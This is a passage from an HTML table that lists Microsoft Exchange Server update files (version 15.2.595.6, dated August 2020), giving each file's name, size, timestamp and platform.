>15.2.595.6</td><td>58,248</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.hygienerules.dll</td><td>15.2.595.6</td><td>29,576</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>15.2.595.6</td><td>175,488</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>15.2.595.6</td><td>28,544</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.retentionpolicyagent.dll</td><td>15.2.595.6</td><td>75,136</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>15.2.595.6</td><td>207,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>15.2.595.6</td><td>440,192</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.supervisoryreviewagent.dll</td><td>15.2.595.6</td><td>83,328</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>15.2.595.6</td><td>35,200</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unifiedpolicycommon.dll</td><td>15.2.595.6</td><td>53,120</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unjournalagent.dll</td><td>15.2.595.6</td><td>96,640</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.migration.dll</td><td>15.2.595.6</td><td>1,109,896</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.migrationworkflowservice.eventlog.dll</td><td>15.2.595.6</td><td>14,728</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>15.2.595.6</td><td>135,560</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.activemonitoring.local.components.dll</td><td>15.2.595.6</td><td>5,063,560</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.servicecontextprovider.dll</td><td>15.2.595.6</td><td>19,848</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mrsmlbconfiguration.dll</td><td>15.2.595.6</td><td>68,480</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>15.2.595.6</td><td>5,086,080</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.rightsmanagement.dll</td><td>15.2.595.6</td><td>265,600</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.networksettings.dll</td><td>15.2.595.6</td><td>37,768</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.notifications.broker.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.notifications.broker.exe</td><td>15.2.595.6</td><td>549,752</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>15.2.595.6</td><td>22,912</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabrequesthandler.dll</td><td>15.2.595.6</td><td>106,368</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.oauth.core.dll</td><td>15.2.595.6</td><td>291,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.objectstoreclient.dll</td><td>15.2.595.6</td><td>17,280</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.configuration.dll</td><td>15.2.595.6</td><td>277,896</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.dll</td><td>15.2.595.6</td><td>2,993,536</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.common.dll</td><td>15.2.595.6</td><td>90,496</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grain.dll</td><td>15.2.595.6</td><td>101,760</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graincow.dll</td><td>15.2.595.6</td><td>38,272</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graineventbasedassistants.dll</td><td>15.2.595.6</td><td>45,440</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grainpropagationengine.dll</td><td>15.2.595.6</td><td>58,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransactionstorage.dll</td><td>15.2.595.6</td><td>147,328</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransportdeliveryagent.dll</td><td>15.2.595.6</td><td>26,496</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graphstore.dll</td><td>15.2.595.6</td><td>184,192</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.permailboxkeys.dll</td><td>15.2.595.6</td><td>26,488</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondarycopyquotamanagement.dll</td><td>15.2.595.6</td><td>38,272</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondaryshallowcopylocation.dll</td><td>15.2.595.6</td><td>55,680</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.security.dll</td><td>15.2.595.6</td><td>147,336</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.semanticgraph.dll</td><td>15.2.595.6</td><td>191,872</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.tasklogger.dll</td><td>15.2.595.6</td><td>33,664</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.partitioncache.dll</td><td>15.2.595.6</td><td>28,040</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.passivemonitoringsettings.dll</td><td>15.2.595.6</td><td>32,648</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.photogarbagecollectionservicelet.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>15.2.595.6</td><td>17,280</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll.fe</td><td>15.2.595.6</td><td>17,280</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>15.2.595.6</td><td>106,880</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.exe.fe</td><td>15.2.595.6</td><td>106,880</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>15.2.595.6</td><td>24,960</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe.fe</td><td>15.2.595.6</td><td>24,960</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popconfiguration.dl1</td><td>15.2.595.6</td><td>42,888</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>15.2.595.6</td><td>264,576</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll.fe</td><td>15.2.595.6</td><td>264,576</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.powersharp.dll</td><td>15.2.595.6</td><td>358,272</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.powersharp.management.dll</td><td>15.2.595.6</td><td>4,165,504</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>15.2.595.6</td><td>308,616</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>15.2.595.6</td><td>41,344</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>15.2.595.6</td><td>30,600</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.fasttransfer.dll</td><td>15.2.595.6</td><td>137,088</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.mapi.dll</td><td>15.2.595.6</td><td>441,728</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioning.eventlog.dll</td><td>15.2.595.6</td><td>14,200</td><td>12-Aug-2020</td><td>20:43</td><td>x64</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>15.2.595.6</td><td>224,640</td><td>12-Aug-2020</td><td>20:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningservicelet.dll</td><td>15.2.595.6</td><td>105,864</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>15.2.595.6</td><td>168,832</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll.deploy</td><td>15.2.595.6</td><td>168,832</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pswsclient.dll</td><td>15.2.595.6</td><td>259,464</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.publicfolders.dll</td><td>15.2.595.6</td><td>72,072</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.crimsonevents.dll</td><td>15.2.595.6</td><td>215,936</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.pushnotifications.dll</td><td>15.2.595.6</td><td>106,880</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.publishers.dll</td><td>15.2.595.6</td><td>425,856</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.server.dll</td><td>15.2.595.6</td><td>70,528</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.analysis.dll</td><td>15.2.595.6</td><td>46,472</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.configuration.dll</td><td>15.2.595.6</td><td>215,944</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.core.dll</td><td>15.2.595.6</td><td>168,328</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.ranking.dll</td><td>15.2.595.6</td><td>343,416</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.retrieval.dll</td><td>15.2.595.6</td><td>174,472</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.suggestions.dll</td><td>15.2.595.6</td><td>95,096</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.realtimeanalyticspublisherservicelet.dll</td><td>15.2.595.6</td><td>127,368</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.core.dll</td><td>15.2.595.6</td><td>63,360</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.data.dll</td><td>15.2.595.6</td><td>36,728</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.mailtagger.dll</td><td>15.2.595.6</td><td>17,784</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.people.dll</td><td>15.2.595.6</td><td>9,666,936</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.peopleindex.dll</td><td>15.2.595.6</td><td>20,788,096</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.peopleranker.dll</td><td>15.2.595.6</td><td>36,736</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.perm.dll</td><td>15.2.595.6</td><td>97,664</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.sassuggest.dll</td><td>15.2.595.6</td><td>28,544</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.upm.dll</td><td>15.2.595.6</td><td>72,072</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.client.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.routing.eventlog.dll</td><td>15.2.595.6</td><td>13,184</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.server.exe</td><td>15.2.595.6</td><td>59,272</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>15.2.595.6</td><td>1,646,976</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>15.2.595.6</td><td>207,232</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>15.2.595.6</td><td>60,296</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>15.2.595.6</td><td>518,024</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.monitoring.dll</td><td>15.2.595.6</td><td>161,152</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>15.2.595.6</td><td>724,352</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>15.2.595.6</td><td>234,888</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>15.2.595.6</td><td>20,856</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>15.2.595.6</td><td>35,200</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpchttpmodules.dll</td><td>15.2.595.6</td><td>42,376</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>15.2.595.6</td><td>56,200</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>15.2.595.6</td><td>27,520</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.rules.common.dll</td><td>15.2.595.6</td><td>130,432</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>15.2.595.6</td><td>14,728</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>15.2.595.6</td><td>20,352</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.safehtml.dll</td><td>15.2.595.6</td><td>21,376</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.activities.dll</td><td>15.2.595.6</td><td>267,648</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.contacts.dll</td><td>15.2.595.6</td><td>110,984</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.core.dll</td><td>15.2.595.6</td><td>112,512</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.services.dll</td><td>15.2.595.6</td><td>622,472</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.dll</td><td>15.2.595.6</td><td>185,216</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.eventlog.dll</td><td>15.2.595.6</td><td>12,160</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.blingwrapper.dll</td><td>15.2.595.6</td><td>19,328</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.core.dll</td><td>15.2.595.6</td><td>211,840</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.ediscoveryquery.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.engine.dll</td><td>15.2.595.6</td><td>97,672</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.configuration.dll</td><td>15.2.595.6</td><td>16,776</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.dll</td><td>15.2.595.6</td><td>436,616</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.files.dll</td><td>15.2.595.6</td><td>274,296</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.flighting.dll</td><td>15.2.595.6</td><td>24,968</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.mdb.dll</td><td>15.2.595.6</td><td>217,984</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.service.exe</td><td>15.2.595.6</td><td>26,488</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.applicationencryption.dll</td><td>15.2.595.6</td><td>221,056</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>15.2.595.6</td><td>1,558,400</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.msarpsservice.exe</td><td>15.2.595.6</td><td>19,840</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.securitymsg.dll</td><td>15.2.595.6</td><td>28,544</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.admininterface.dll</td><td>15.2.595.6</td><td>225,152</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.common.dll</td><td>15.2.595.6</td><td>5,151,112</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.diagnostics.dll</td><td>15.2.595.6</td><td>214,920</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.directoryservices.dll</td><td>15.2.595.6</td><td>115,584</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.esebackinterop.dll</td><td>15.2.595.6</td><td>82,816</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.eventlog.dll</td><td>15.2.595.6</td><td>80,768</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.fulltextindex.dll</td><td>15.2.595.6</td><td>66,440</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.ha.dll</td><td>15.2.595.6</td><td>81,288</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.lazyindexing.dll</td><td>15.2.595.6</td><td>211,848</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.logicaldatamodel.dll</td><td>15.2.595.6</td><td>1,340,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.mapidisp.dll</td><td>15.2.595.6</td><td>511,880</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.multimailboxsearch.dll</td><td>15.2.595.6</td><td>47,488</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.physicalaccess.dll</td><td>15.2.595.6</td><td>873,336</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertydefinitions.dll</td><td>15.2.595.6</td><td>1,352,072</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertytag.dll</td><td>15.2.595.6</td><td>30,592</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.rpcproxy.dll</td><td>15.2.595.6</td><td>130,432</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storecommonservices.dll</td><td>15.2.595.6</td><td>1,018,760</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storeintegritycheck.dll</td><td>15.2.595.6</td><td>111,496</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.workermanager.dll</td><td>15.2.595.6</td><td>34,688</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.xpress.dll</td><td>15.2.595.6</td><td>19,328</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>15.2.595.6</td><td>60,808</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.dll</td><td>15.2.595.6</td><td>50,560</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.common.dll</td><td>15.2.595.6</td><td>74,112</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>15.2.595.6</td><td>8,493,952</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>15.2.595.6</td><td>30,080</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.ewshandler.dll</td><td>15.2.595.6</td><td>633,736</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.ewsserialization.dll</td><td>15.2.595.6</td><td>1,651,072</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.json.dll</td><td>15.2.595.6</td><td>296,320</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.messaging.dll</td><td>15.2.595.6</td><td>43,400</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.onlinemeetings.dll</td><td>15.2.595.6</td><td>233,344</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.surface.dll</td><td>15.2.595.6</td><td>178,568</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.wcf.dll</td><td>15.2.595.6</td><td>348,544</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>15.2.595.6</td><td>56,704</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.bootstrapper.common.dll</td><td>15.2.595.6</td><td>93,064</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common.dll</td><td>15.2.595.6</td><td>296,320</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.commonbase.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.console.dll</td><td>15.2.595.6</td><td>27,008</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.gui.dll</td><td>15.2.595.6</td><td>114,560</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.parser.dll</td><td>15.2.595.6</td><td>53,632</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>15.2.595.6</td><td>75,136</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.caches.dll</td><td>15.2.595.6</td><td>142,720</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.client.dll</td><td>15.2.595.6</td><td>24,960</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.eventlog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.exe</td><td>15.2.595.6</td><td>58,752</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharepointsignalstore.dll</td><td>15.2.595.6</td><td>27,016</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.slabmanifest.dll</td><td>15.2.595.6</td><td>46,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>15.2.595.6</td><td>46,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.service.exe</td><td>15.2.595.6</td><td>28,032</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.worker.exe</td><td>15.2.595.6</td><td>26,496</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.eventlog.dll</td><td>15.2.595.6</td><td>13,696</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.exe</td><td>15.2.595.6</td><td>31,616</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>15.2.595.6</td><td>1,205,128</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>15.2.595.6</td><td>158,592</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.symphonyhandler.dll</td><td>15.2.595.6</td><td>628,096</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.syncmigration.eventlog.dll</td><td>15.2.595.6</td><td>13,192</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.syncmigrationservicelet.dll</td><td>15.2.595.6</td><td>16,256</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.systemprobemsg.dll</